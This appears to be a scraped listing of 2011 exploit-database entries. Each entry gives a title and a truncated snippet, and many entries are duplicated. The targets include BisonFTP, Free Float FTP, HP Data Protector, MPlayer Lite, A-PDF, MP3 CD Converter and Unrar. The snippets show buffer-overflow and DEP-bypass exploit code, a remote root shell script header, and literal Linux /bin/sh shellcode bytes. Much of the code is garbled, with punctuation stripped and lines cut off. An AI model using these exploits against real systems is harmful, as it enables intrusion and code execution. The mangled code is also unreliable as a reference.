EChat-Server-v2.5

EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts...

MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass

MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass !/usr/bin/python +Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit +Date: 11\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.3.0 +Tested On: WIN-XP SP3...

MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass

!/usr/bin/python +Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit +Date: 11\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A from struct import pack from...

BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/python BisonFTP Server \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 padding buffer = "\x90" 1092 36...

A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit

Exploit for windows platform in category local exploits !/usr/bin/ruby +Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit +Date: 09\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.a-pdf.com/all-to-mp3/ +Version: 2.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/...

HP Data Protector (Linux) - Remote Command Execution

HP Data Protector Linux - Remote Command Execution !/bin/bash Exploit Title: HP Data Protector Remote Root Shell for Linux Date: 2011-08-10 Author: SZ Software Link:http://www8.hp.com/us/en/software/software- product.html?compURI=tcm:245-936920&pageTitle=data-protector Version: 0.9 Tested on:...

HP Data Protector (Linux) - Remote Command Execution

!/bin/bash Exploit Title: HP Data Protector Remote Root Shell for Linux Date: 2011-08-10 Author: SZ Software Link:http://www8.hp.com/us/en/software/software- product.html?compURI=tcm:245-936920&pageTitle=data-protector Version: 0.9 Tested on: HP-UX, Linux CVE: CVE-2011-0923 Notes: ZDI-11-055...

A-PDF All to MP3 2.3.0 - Universal DEP Bypass

!/usr/bin/ruby +Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit +Date: 09\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.a-pdf.com/all-to-mp3/ +Version: 2.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A Dep bypass method: LoadLibraryA"kernel32.dll" +...

BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow

!/usr/bin/python BisonFTP Server \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 padding buffer = "\x90" 1092 368 bytes shellcode buffer +=...

Free-Float-FTP-REST

Free Float FTP Server ACCL Command Remote Buffer Overflow Exploit ToDo: Add remote shell ToDo: Test vulnerable targets import errno from os import strerror from socket import import sys from time import sleep from struct import pack if lensys.argv != 3: print "-Usage: python %s " % sys.argv0 prin...

HP Data Protector Remote Shell

!/bin/bash Exploit Title: HP Data Protector Remote Shell for HPUX Date: 2011-08-02 Author: Adrian Puente Z. Software Link:http://www8.hp.com/us/en/software/software- product.html?compURI=tcm:245-936920&pageTitle=data-protector Version: 0.9 Tested on: HPUX CVE: CVE-2011-0923 Notes: ZDI-11-055...

Unrar 3.9.3 - Local Stack Overflow

Unrar 3.9.3 - Local Stack Overflow !/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820;...

Unrar 3.9.3 Stack Overflow

!/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820; $pname = "/usr/bin/unrar"; die "-File...

Unrar 3.9.3 Local Stack Overflow Exploit

Exploit for linux platform in category local exploits !/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-'...

Filter Proxy HTTP Headers Mismatch

Filter web Proxy is a proxy tool that interferes between a web server and a client browser. It enables users to change the HTTP headers and client side content, e.g. HTML and JavaScript. The filter proxy can also block pop-ups and malicious content. Malicious users can use this technique to chang...

MPlayer Lite 33064 Buffer Overflow

!/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download +Version: Lite 33064 +Tested On:...

MPlayer Lite r33064 m3u Buffer Overflow Exploit (DEP Bypass)

No description provided by source. !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...

OSX - Universal ROP shellcode

OSX - Universal ROP shellcode. Shellcode exploit for osx platform ; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don't want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; - put your 'normal' shellcode in...

MPlayer Lite r33064 m3u Buffer Overflow Exploit (DEP Bypass)

Exploit for windows platform in category local exploits !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link:...

MPlayer Lite r33064 - .m3u Local Buffer Overflow (DEP Bypass)

MPlayer Lite r33064 - .m3u Local Buffer Overflow DEP Bypass !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link:...